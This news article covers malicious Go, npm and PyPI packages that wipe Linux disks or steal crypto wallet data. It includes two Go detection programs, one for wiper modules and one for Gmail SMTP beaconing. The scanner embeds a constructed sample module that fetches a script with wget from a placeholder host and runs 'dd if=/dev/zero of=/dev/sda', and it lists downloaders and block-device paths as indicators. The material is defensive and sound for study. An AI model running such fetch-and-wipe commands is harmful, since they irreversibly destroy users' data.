Cybersecurity researchers have uncovered a new wave of dangerous supply chain attacks targeting software development ecosystems. These attacks use malicious Go modules and npm and PyPI packages to either wipe Linux systems or steal sensitive data, including cryptocurrency wallet information.
According to Kush Pandya of Socket, three newly discovered Go modules disguise their true purpose using obfuscated code. Once executed, they fetch a destructive payload designed to overwrite a Linux system’s primary disk, rendering it permanently inoperable.
Go Modules Deliver Devastating Payloads
The three malicious Go packages uncovered are:
github[.]com/truthfulpharm/prototransform
github[.]com/blankloggia/go-mcp
github[.]com/steelpoor/tlsproxy
Though they appear harmless, these modules contain hidden logic that checks whether the host operating system is Linux. If it is, the code uses wget to download a shell script from a remote server. That script then overwrites the /dev/sda disk with zeroes, an irreversible action that destroys all stored data and leaves the system unbootable.
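The three indicators described above (a runtime.GOOS gate, a shell-out to wget or a similar fetcher, and a reference to a raw block device) are all visible in a Go file's syntax tree, which makes them a cheap triage check to run over a vendor directory or module cache before a build. The scanner below is an added example written for this page, not code from Socket or from the modules named above; the two embedded source samples are constructed to contain (and to not contain) those indicators, and the URL and paths in them are placeholders.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strconv"
	"strings"
)

// Indicators collected from one Go source file. They mirror the behaviour
// described above: a runtime.GOOS check, an external downloader invoked via
// os/exec, and string literals naming a raw block device.
type Indicators struct {
	ChecksGOOS      bool
	ExecsDownloader bool
	BlockDevices    []string
}

// Suspicious is true when a GOOS gate and a downloader exec appear together;
// a non-empty BlockDevices list is the strongest single sign of a wiper.
func (in Indicators) Suspicious() bool {
	return in.ChecksGOOS && in.ExecsDownloader
}

// Binaries a second-stage fetch typically shells out to.
var downloaders = map[string]bool{"wget": true, "curl": true, "sh": true, "bash": true}

// Device prefixes that have no business appearing in an application library.
var devicePrefixes = []string{"/dev/sd", "/dev/nvme", "/dev/vd", "/dev/xvd", "/dev/hd"}

// ScanGoSource parses src with go/parser and walks the AST for the indicators.
func ScanGoSource(src string) (Indicators, error) {
	var in Indicators
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, "module.go", src, 0)
	if err != nil {
		return in, err
	}
	ast.Inspect(f, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.BinaryExpr: // runtime.GOOS == "linux", != "windows", ...
			if isSelector(x.X, "runtime", "GOOS") || isSelector(x.Y, "runtime", "GOOS") {
				in.ChecksGOOS = true
			}
		case *ast.CallExpr: // exec.Command("wget", ...)
			if isSelector(x.Fun, "exec", "Command") && len(x.Args) > 0 {
				if name, ok := stringLit(x.Args[0]); ok && downloaders[name] {
					in.ExecsDownloader = true
				}
			}
		case *ast.BasicLit: // any string literal that mentions a block device
			if s, ok := stringLit(x); ok && isBlockDevice(s) {
				in.BlockDevices = append(in.BlockDevices, s)
			}
		}
		return true
	})
	return in, nil
}

// isSelector reports whether e is the expression pkg.name.
func isSelector(e ast.Expr, pkg, name string) bool {
	sel, ok := e.(*ast.SelectorExpr)
	if !ok {
		return false
	}
	id, ok := sel.X.(*ast.Ident)
	return ok && id.Name == pkg && sel.Sel.Name == name
}

// stringLit returns the unquoted value of a string literal expression.
func stringLit(e ast.Expr) (string, bool) {
	lit, ok := e.(*ast.BasicLit)
	if !ok || lit.Kind != token.STRING {
		return "", false
	}
	s, err := strconv.Unquote(lit.Value)
	return s, err == nil
}

func isBlockDevice(s string) bool {
	for _, p := range devicePrefixes {
		if strings.Contains(s, p) {
			return true
		}
	}
	return false
}

// sampleModule is a constructed stand-in for the behaviour the article
// describes (GOOS gate, wget fetch, zero-fill of /dev/sda); it is not code
// from the real packages and the URL is a placeholder.
const sampleModule = `package prototransform

import (
	"os/exec"
	"runtime"
)

func init() {
	if runtime.GOOS != "linux" {
		return
	}
	exec.Command("wget", "-O", "/tmp/done.sh", "http://example.invalid/done.sh").Run()
	exec.Command("sh", "-c", "dd if=/dev/zero of=/dev/sda bs=1M status=none").Run()
}
`

// benignModule is a constructed cross-platform helper: it checks GOOS but
// never shells out, so it must not be flagged.
const benignModule = `package pathutil

import "runtime"

func Sep() string {
	if runtime.GOOS == "windows" {
		return "\\"
	}
	return "/"
}
`

func main() {
	for name, src := range map[string]string{"sample": sampleModule, "benign": benignModule} {
		in, err := ScanGoSource(src)
		if err != nil {
			fmt.Println(name, "parse error:", err)
			continue
		}
		fmt.Printf("%s: suspicious=%v goos=%v exec=%v devices=%v\n",
			name, in.Suspicious(), in.ChecksGOOS, in.ExecsDownloader, in.BlockDevices)
	}
}
```

Because the real modules were obfuscated, literal matching like this catches only the unobfuscated layer; treat a hit as a reason to pull the module into a sandbox and watch what it fetches and writes, not as the whole check.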
“This destructive method ensures no data recovery tool or forensic process can restore the data,” said Pandya. “It highlights the extreme risk posed by modern supply chain attacks that turn trusted code into catastrophic threats.”
These modules serve as a warning to developers and IT administrators, especially those running Linux environments. The packages were crafted to blend in with legitimate repositories, using convincing names and plausible functionality.
Widespread Threats Across npm and PyPI Ecosystems
The Go modules aren’t the only threat. Researchers from Socket, Sonatype, and Fortinet also reported a surge in malicious npm and PyPI packages. These packages are designed to steal mnemonic seed phrases and private keys from cryptocurrency wallets and developer systems.
The malicious npm packages include:
crypto-encrypt-ts
react-native-scrollpageviewtest
bankingbundleserv
buttonfactoryserv-paypal
tommyboytesting
compliancereadserv-paypal
oauth2-paypal
paymentapiplatformservice-paypal
userbridge-paypal
userrelationship-paypal
These packages masquerade as legitimate modules, several of them posing as PayPal payment integrations or encryption helpers. Once installed, they secretly exfiltrate sensitive data to remote servers controlled by the attackers.
In the Python Package Index (PyPI), two specific malware-laced packages, web3x and herewalletbot, target crypto wallets and siphon mnemonic phrases. Together, they have been downloaded more than 6,800 times since their 2024 release.
Researchers also flagged seven more PyPI packages that use Gmail’s SMTP server and WebSockets for stealthy communication:
cfc-bsb (2,913 downloads)
coffin2022 (6,571 downloads)
coffin-codes-2022 (18,126 downloads)
coffin-codes-net (6,144 downloads)
coffin-codes-net2 (6,238 downloads)
coffin-codes-pro (9,012 downloads)
coffin-grave (6,544 downloads)
These packages contain hard-coded Gmail credentials used to signal successful infection. After that, they create a WebSocket connection for two-way communication with the threat actor. This technique leverages the trust associated with Gmail domains to bypass corporate firewalls and endpoint protection tools.
Interestingly, the cfc-bsb package omits the Gmail trick but still contains WebSocket code, making it a tool for remote access.
Developer Guidelines to Stay Secure
To protect against such attacks, security experts recommend several steps:
- Always verify the history of a package’s publisher.
- Check linked GitHub repositories and cross-reference activity.
- Audit dependencies frequently, especially those pulled from public registries.
- Implement strict access controls on private keys and credentials.
- Monitor network traffic for suspicious activity, especially outbound SMTP and WebSocket connections from developer workstations and build hosts that have no business sending mail.
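The Gmail beacon described in the PyPI section and the monitoring guideline above both come down to one detection: a developer or build host opening an SMTP submission connection, to Gmail in particular, when it is not an approved mail relay. The detector below is an added example written for this page, not tooling from Socket, Sonatype or Fortinet. It assumes a DNS- or SNI-enriched connection log in a simple key=value format of my own choosing; the hosts, addresses and relay list in it are constructed.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Conn is one outbound connection record. The Host field is assumed to come
// from DNS or TLS SNI enrichment; conn logs alone carry only the IP.
type Conn struct {
	Time  string
	Src   string
	Dst   string
	DPort int
	Host  string
}

// Alert pairs a flagged record with the reason it fired.
type Alert struct {
	Conn   Conn
	Reason string
}

// SMTP relay, SMTPS and submission ports.
var smtpPorts = map[int]bool{25: true, 465: true, 587: true}

// ParseConn parses a record such as
// "2025-05-06T09:14:02Z src=10.20.4.17 dst=142.250.27.108 dport=587 host=smtp.gmail.com".
func ParseConn(line string) (Conn, error) {
	fields := strings.Fields(line)
	if len(fields) < 2 {
		return Conn{}, fmt.Errorf("malformed record: %q", line)
	}
	c := Conn{Time: fields[0]}
	for _, kv := range fields[1:] {
		k, v, ok := strings.Cut(kv, "=")
		if !ok {
			return Conn{}, fmt.Errorf("bad field %q in %q", kv, line)
		}
		switch k {
		case "src":
			c.Src = v
		case "dst":
			c.Dst = v
		case "host":
			c.Host = v
		case "dport":
			p, err := strconv.Atoi(v)
			if err != nil {
				return Conn{}, fmt.Errorf("bad dport %q in %q", v, line)
			}
			c.DPort = p
		}
	}
	if c.Src == "" || c.DPort == 0 {
		return Conn{}, fmt.Errorf("missing src or dport in %q", line)
	}
	return c, nil
}

// DetectSMTPBeacons flags outbound SMTP from any source that is not an
// approved relay. Connections to Gmail get a sharper reason because that is
// the exact channel the coffin-* packages use to signal infection.
func DetectSMTPBeacons(lines []string, approvedRelays map[string]bool) ([]Alert, error) {
	var alerts []Alert
	for _, line := range lines {
		c, err := ParseConn(line)
		if err != nil {
			return nil, err
		}
		if !smtpPorts[c.DPort] || approvedRelays[c.Src] {
			continue
		}
		reason := fmt.Sprintf("outbound SMTP (port %d) from non-relay host %s", c.DPort, c.Src)
		if strings.HasSuffix(c.Host, ".gmail.com") || strings.HasSuffix(c.Host, ".google.com") {
			reason = fmt.Sprintf("Gmail SMTP submission from non-relay host %s (beacon pattern)", c.Src)
		}
		alerts = append(alerts, Alert{Conn: c, Reason: reason})
	}
	return alerts, nil
}

// Constructed sample: a developer workstation (10.20.4.17) beaconing to
// Gmail, the approved relay (10.20.1.5) doing normal mail, a registry fetch,
// and a second workstation talking SMTP to an internal mail host.
var sampleLog = []string{
	"2025-05-06T09:14:02Z src=10.20.4.17 dst=142.250.27.108 dport=587 host=smtp.gmail.com",
	"2025-05-06T09:14:05Z src=10.20.1.5 dst=203.0.113.25 dport=25 host=mx.partner.example",
	"2025-05-06T09:14:09Z src=10.20.4.17 dst=104.16.0.35 dport=443 host=registry.npmjs.org",
	"2025-05-06T09:15:40Z src=10.20.4.23 dst=10.20.1.9 dport=25 host=mail.corp.example",
}

var approvedRelays = map[string]bool{"10.20.1.5": true}

func main() {
	alerts, err := DetectSMTPBeacons(sampleLog, approvedRelays)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for _, a := range alerts {
		fmt.Printf("%s %s -> %s:%d  %s\n", a.Conn.Time, a.Conn.Src, a.Conn.Host, a.Conn.DPort, a.Reason)
	}
}
```

Egress filtering that only permits the relay to reach ports 25, 465 and 587 turns this detection into prevention; the WebSocket leg of the same packages rides over 443 and needs proxy or SNI logging rather than port-based rules.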
“Do not trust a package just because it’s been around for years,” warned Olivia Brown of Socket. “Malicious actors are getting smarter and more patient. They wait until a package gains trust before injecting malicious code.”
These incidents highlight how the software supply chain remains a soft target for cybercriminals. As tools become more automated, and attackers more sophisticated, developers must treat every third-party dependency as a potential risk.